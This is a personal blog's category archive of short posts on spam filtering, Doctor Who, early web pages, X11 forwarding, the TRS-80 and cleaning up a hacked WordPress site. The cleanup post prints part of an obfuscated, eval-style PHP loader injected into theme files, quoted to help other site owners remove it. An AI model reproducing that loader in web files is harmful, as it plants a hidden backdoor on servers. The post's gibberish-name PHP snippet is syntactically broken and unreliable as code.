Category Archives: Internet

Gibberish Last Names Clogging up Subscriptions

I had been annoyed recently by an increasing number of SPAM subscriptions on my web site. The script behind the form for these subscriptions and requests for rebate immediate send out a confirmation email to the address entered (as well as to the admin of the site) and add the visitor to a database.

Initially there were a few of those spam entries and I could easily go into the database and manually remove them. But they became more and more numerous, so the first step was to add a link to the email the admin received which allowed for an easy removal of that spam entry.

But finally it got so annoying and time-consuming that I tried to think of a more automated way to handle the spam entries. What they all had in common was

  • a good first name
  • a gibberish last name like NLMAkPJpIVyqCkCeuEh, YijhgzswktJTVWqXhmA or MPSVPkfXInMzFYhEOpp
  • and a good email

The email was probably a good one because there were hardly any bounces for the automatic confirmation emails. That actually bothered me also because these poor recipients got some SPAM apparently coming from me.

Now the quest for me was to find something that all these spam entries had in common so that I could filter them somehow. Unfortunately php does not have a ‘gibberish’ function, so I had to come up with one of my own. Meditating over these entries I finally saw that these spam names often have longer sequences of consonants than would occur in valid names.

With a little bit of help from my friends at Google I came up with the following. With the hope that it might help somebody bothered by the same spammers, here the code snippet to filter those entries:

$first = $_REQUEST[first];
$last = $_REQUEST[last];
$gibberish = preg_match('/[bcdfghjklmnpqrstvwxz]{4,}/i', $first)
          || preg_match('/[bcdfghjklmnpqrstvwxz]{4,}/i', $last);
if (! $gibberish) {
    //do the regular processing
else {
    // pretend every thing went find for the spammer
    // but don't really do anything

Will see how many will slip through – gibberish with less than 4 consonants in a row.

What I am still curious about is ‘WHY’? What the spammer intends with these spam entries. I don’t see any way that could be beneficial to him/her. Discrediting me because the site sents out spam? But why then use gibberish in the last name? I am really curious.

The Internet is Humming with Dr. Who

The-Doctor-and-ClaraToday the wait was over – the second half of season 7 of Dr. Who has started.

I bet that most views of the show happened on the official channels like BBC America here in the US of A, but, as we are out in the boons, with the cable left behind, we depended on the good old pirate bay to get our fix of Dr. Who (obviously this is a lie, as we would never download any tv show illegally.) Had we actually looked at the torrents we would have been surprised by all the buzz on the interconnected pipes that make up the internet. Way over 2000 seeders is rather rare, and still, download speed would have been – had we done that – still rather slow, so there would have been many, many people as excited to find out about the Doctor’s new adventures and all with a new companion.

Had we been able to watch the show after downloading it illegally we would have been able to actually watch it on the west coast before it officially aired. As I write this, it’s only a bit after the show ended and we would have finished it hours ago – way ahead of all the people waiting for the BBC to start it – Man – are time zones cool, or what?

I’m really curious if the Doctor will get lucky with this companion, but I’m not really holding my breath as one of the big tensions in the series is that that never happens. Strange things can happen if time travel is involved, like Amy turning out to be the Doctor’s mother in law – who comes up with those things?

Thanks, Steven Moffat!

The Hobby Kitchen – A Pre-Blog

thai-recipesThis is history as we made it!

It was in the early days of the internet, a time when Google did not exist yet, when we used Alta Vista to find things on that interweb. When Netscape was strong and the driving force for new developments on this world wide web. When there were pages at Netscape where you could tell the world about new sites or pages – and the world came.

It was 1995!

This is when we started something that would later be called a blog. Sure, there was no PHP (at least on the web) and certainly no WordPress, so the blog entries had to be crafted by hand, usually in a simple text editor and the blogger had to know HTML. Not that there was much to be known – the leading edge of HTML tags were background images and music.

This was the year ‘My Hobby Kitchen’ was born. The plan was to publish one Thai recipe every few days, or how often we managed. If we had kept it up, by now we would have – at one recipe per day – close to one thousand recipes. That number shows that it was just not possible, as nobody knows 1000 recipes. We did – maybe – foresee that and invented the ‘guest blogger.’ But only one came on board, shortly before the project died.

The amazing part of the story is that these pages survived. After a multitude of ISPs, and moving between different domains, these pages are still there and they are finding a new home now on this (real) blog.

I kept the pages as they were, just made some adjustments to fit into the framework of this blog, removed any pointers to websites that don’t exist anymore, and anonymized it to protect the guilty. But I left all the tacky background music (at least it does not start automatically) and images intact so that all those young people can see how it all started. It was written from the perspective of my significant other who is Thai and knew what she was doing – yours truly was just the webmaster.

Without any further ado, here is

My Hobby Kitchen.

X11Forwarding But DISPLAY variable not set

x11-logoSerious programming in the olden days mean to deal with Unix – the father of today’s ubiquitous Linux running bigger part of the internet.

The first bigger project I was involved in was still the good old DOS with Turbo Pascal – anybody remember that?

As soon as I could, and we had to build something less of a hack but more of a software-engineered application, I steered my client into Unix, first the X86 version of Xenix, which turned out to be too flaky, and then a nice hundred thousand dollar HP Workstation. As it was an application involving graphics, an important order of business was to get familiar with the principles and techniques of the X11 windowing system.

This was not a very long-lived project and with the advent of more powerful x86 hardware and a finally decent piece of software from Microsoft – Windows NT – the develoment was moved to that new platform. The fact that the port from X to NT was not terribly difficult was a nice testimonial for proper application of software engineering principles. Hacking mentality as promoted by something like Turbo Pascal would have required a complete rewrite.

System administration, I had become familiar with during that time, was helpful when I started to maintain a few linux web servers years later. I always considered X11 far superior to all the other graphical windows software but I really had never anything to do with it any more – until a point in time a few days ago.

First of all, I finally succeeded in getting Ubuntu running on an old laptop. A flaky DVD had never gotten me through an installation properly and the machine was so old that it could not boot from a memory stick. I ultimately succeeded when I found a utility I could burn on a CD and boot from that made my USB bootable. Now I could load Ubuntu from the USB stick.

So, there I finally was again with a computer with a proper graphical user interface. But that computer was tucked away somewhere with little physical access. It serve as a local testing machine for web development – did not really need that X Windows for that!

But it was sitting there, teasing me, so I finally got XMing – an X Server running on MS Windows – installed on my main computer where I sit all day and I could finally connect to that old laptop remotely with a graphical user interface. In my early days of X11 there was not too much concern about security – it was all on the local network – yes, a coax ethernet cable – and to have an application display on an xterminal you just had to set the DISPLAY environment variable to the IP address of any X-Server, like a xterminal, and authorize its use.

That is all different now. I learned that from a remote machine you start an ssh connection on my workstation (windows 7) to the remote host (old linux laptop) using putty. If the putty session had X Forwarding enabled then a secure tunnel for all the X traffic was created. This tunnel could even go through a router with NAT without a problem. Initially I had wondered why I saw the value of the DISPLAY variable set to strange things like localhost:10.0 – but I finally understood that this was how the ssh tunnel worked: the ssh server on the old laptop pretended to be a local X server on display number 10; then it transported all the X traffic it received securely to the machine I was sitting on and fed it into XMing. It all worked perfectly.

Two weeks later I received my first Raspberry Pi and that little wonder did behave the same way as the old laptop, a bit slower I have to admit, so the old laptop is still a bit more powerful than the miniature linux box sitting over there on my speaker. Both are full LAMP systems and are even accessible from the rest of the world through the magic of DynDNS and port forwarding.

But then my trouble began.

As I had all this so nicely and easily set up, it was suddenly not enough any more that I logged into my real web servers only with putty, SCP, and DirectAdmin. Nostalgia had me in its grip and I just had to get X running on them as well.

First of all there was no X-stuff installed on those servers as they were web servers in some remote data center. But a “yum install xterm” got this handled. Still no go – starting xterm from the ssh login gave me the error message that the display was either not there or could not be opened.

The next step, I found out, was to enable X11Forwarding for the sshd on the remote server – but still no go – the DISPLAY variable was still not set. Lots of Googling around but no solution – everything I tried made no difference.

But I learned about the -vvv parameter to ssh. It would give me insight into what was happening during the establishing of the ssh connection. Unfortunately, putty does not have it! But I found that it has a logging function and after turning this on and comparing the logs from connections to my local old laptop and the remote web server I finally saw the light:


After I had it yum-installed and run to generate a new .Xauthority file for a local X server my quest for the xterm running on that web server and displaying on my local machine behind a NAT router in my office had come to a successful conclusion.

Not that I will use that much – putty and SCP have done the job for me for years – but I now could, potentially, install firefox on that server and start browsing through that server located at a very different place on the planet.

Hmmm  – why don’t I just try that: yum install firefox……………………….
finally, after installing a gazillion dependent packages, the installation is – complete!

Now: firefox& – wait – wait – wait…


But it is clear that I have to file this away under ‘education’ as it is so slow to make it more or less unusable.

The Good Old Trash 80

I ran into a web site today showing the 1980’s Radio Shack catalog of the TRS 80.

It made me feel sentimental as my very first computer had been a Trash-80 and I remember having a lot of fun with it. One of the most difficult tasks for me to understand, at that time, had been the idea of an interpreted language, like that TRS-80 Basic.

Before that computer, I had been mostly exposed to assembler and some high-level language like Fortran and PL3 on an IBM mainframe. The idea of typing in human-readable code and directly running it – without compiling and linking – was a strange concept for me to grasp.

The TRS-80 I had was far less sophisticated than the one shown in the above catalog, so I looked around and found a picture that matched better what I remembered:

I believe that I had the 16kB model but certainly no floppy disks – I saved my programs and data on cassette tape. With my difficulty to grasp the concept of interpreted languages the first program I bought was an assembler. I was quite some work to get anything done with this setup:

  • Insert the cassette with the assembler and load the program
  • Edit and assemble the code, keeping source and assembled program in memory
  • Insert a new cassette into the recorder and save the source file
  • Insert a different cassette into the recorder and save the assembled program
  • Load the assembled program (overwriting the assembler in memory)
  • Running, testing the assembled program and writing down errors
  • Rinse and repeat

This lengthy procedure trained you to really think ahead and consider all possible errors – it took too long to ‘just try’ something. In this regards those interpreted languages are much easier and train programmers to be much sloppier.

The bigger part of the internet now is based on such sloppy work – whenever you have a PHP file it is more or less interpreted like the old Basic in my Trash 80. I once read – and it made a lot of sense – that we would do a lot to avoid global warming if we would compile all those billions of lines of PHP code into machine code once and then execute that on the server. All data centers around the world could be scaled down considerably if each line of PHP code would not have to be compiled over and over and over again, thus saving energy for the processors of the webserver and the energy for cooling them.

Maybe, then the web could run on a couple of TRS-80s.

Triumph of the Nerds

Now that all those nerds that created the computer revolution are getting to an age where we might lose them – see Steve Jobs – documentaries like Robert X. Cringley’s Triumph of the Nerds become more of a history text book (book understood more figuratively).

In the old InfoWorld magazine/newspaper Cringley’s column “Notes from the Field” was always my favorite – your’s too, Max, right?

So, I just had to stop and listen (and watch) when I ran into his documentary “Triumph of the Nerds” on Youtube.

A Tojan of the name going to

This is only the second time that one of my site was hacked – not bad for how long I am doing this type of stuff.

Took me a while, amongst other things, because the location of my server changed due to a data-center consolidation. So it was not quite that easy to know why things were going wrong – was it the hack or was it some configuration problem with the new IP?

But eventually all turned out fine and the site is working properly again. As I looked around the net quite a bit and did not find a good solution, I thought I share here in the hope that it might help another soul at some time.

First indication was a report from a message board having deleted a link to the site in question that it was distributing malware. I had not seen anything wrong and my anti virus stuff never told me anything, so the first reaction was to disregard it. But then suddenly I got a message from AVast that it had blocked a bad-bad URL. Now I knew something was wrong. The bad URL was a random subdomain on the top-level  “” – but a grep over the site did not bring anything about osa or .pl. Then I received another report from my VPS host that this was the trojan.

Not much luck on the net finding info how that might look on infected web sites so that I could start trusty old grep.

Looked a lot through the database dump for clues – forgot to tell, this was a site with a wordpress blog used as CMS – no luck!

Ended up swapping out all the WP code, and updating php to 5.3.8 because some of the info I had found about the were indicating that a vulnerability in the 5.2.17 I ran were at fault. None made a difference. I had disabled all plugins – that did not make a difference either – where else could it be?

Finally the good idea came and I should have looked there first: a diff over the theme I was using with an installation that used the same finally gave a long list of differences in a few files – mostly index.php, header.php and footer.php – the code added to the end of these files was:

<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = “7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0Zupm
…and so on
= “\x65\144\x6f\154\x70\170\x65”;$eva1tYldakBcVSir = “\x73\164\x72\162\x65\166”;$eva1tYldakBoVS1r = “\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160”;$eva1tYidokBoVSjr = “\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\x76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\x76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145”;$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);$eva1tYldakBc
VSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBc
VSjr[0.061*0.031]));$eva1tYldakBcVSir = “”;$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = “\x73\164\x72\x65\143\x72\160\164\x72”;$eva1tYlbakBcVSir = “\x67\141\x6f\133\x70\170\x65”;$eva1tYldakBoVS1r = “\x65\143\x72\160”;$eva1tYldakBcVSir = “”;$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>

Removing these lines from the end of the theme filed did the job. Then I obviously changed all the file permission to not allow apache to change those files any more.

Last decree was to change the password of the owner of the site and reduce him from an admin to an editor – and tell him to scan his computer.

Now I just have to send him an email with his new password.

Hope this might help somebody sometime.

The How-to-Geek Blog

One of the few things that remain on my ‘look-at-every-time” blogs is How-to Geek.

In its year-end cleaning they revisited their Best How-To Geek Guides of 2011. Subjects covered are:

  1. The How-To Geek Guide to Getting Started with LastPass
  2. The How-To Geek Guide to XBMC Add-Ons
  3. The How-To Geek Guide to Making Your Own Custom Ethernet Cables
  4. The How-To Geek Guide to Getting Started with Usenet
  5. Hardware Upgrade: The HTG Guide to Picking the Right PC Monitor
  6. The Beginner’s Guide to Using QoS (Quality of Service) on Your Router
  7. How to Secure Your Wi-Fi Network Against Intrusion
  8. How to Use a Soldering Iron: A Beginner’s Guide
  9. How to Pick the Right Motherboard for Your Custom-Built PC
  10. The How-To Geek Video Guide to Using Windows 7 Speech Recognition
  11. The Beginner’s Guide to Shell Scripting
  12. The How-To Geek Guide to Hackintoshing
  13. The How-To Geek Guide to Audio Editing Using Audacity
  14. The How-To Geek Guide to Scoring Free Wi-Fi
  15. The How-To Geek Guide to 3D Monitors and TVs
  16. The How-To Geek Guide to Buying an HDTV

How come I read this blog and not the many others I am subscribed to?

The reason is simply that this is the only one I am subscribed to by email. I had, in the past, set up RSS feeds for all the other sites I wanted to keep up with in my Thunderbird and I read, or at least skimmed, them all on a daily basis.

Until it got too time consuming and I decided to use Google Reader so that these new posts did not interrupt my workflow. I transferred all the feeds to Google Reader and made a nice icon in my task bar for it – – – and that is where it remains – mostly unnoticed. Now, when I remember to check new blog posts, I have an overwhelming “>1000” to deal with. So, most of the time, I just select ‘set all as read’ and be done with it.

Conclusion – email still gets much more of my attention than RSS feeds in Reader.

Experiments in QR

Before there was NFC (near field communication), now built into the Nexus S, to read tags embedded in physical objects via electromagnetic radiation, there was another method of doing the same thing with light (just another electromagnetic wave length), which did not catch on as much as I wished it had – because I think, it’s darn cool and it’s so much cheaper to print a QR code on something instead of buying these NFC chips. Sure, communication is one-way but when comparing the cost of printing a little square on a sticker with the current cost of NFC stickers (about a dollar) the choice for the occasional user seems to be clear.

But if we look at Google for guidance, it appears the QR code might be dead. They had started to promote QR codes heavily a while back with Google Local stickers (with a QR code) sent to local businesses, but that is now all over and Android appears to be heading – again heavily – into support for NFC.

Oh well, but you can nicely play with QR codes and the error correction even allows to mess with the codes to a degree.

I did just that and came up with this custom QR code. It is pointless for this article because you are already on the site this code points to, but I had fun playing with it (the original code was generated by Raco Industries.) And then I went wild with photoshop and made my very own vanity QR code.

Take a look, get out your phone and see if it really works…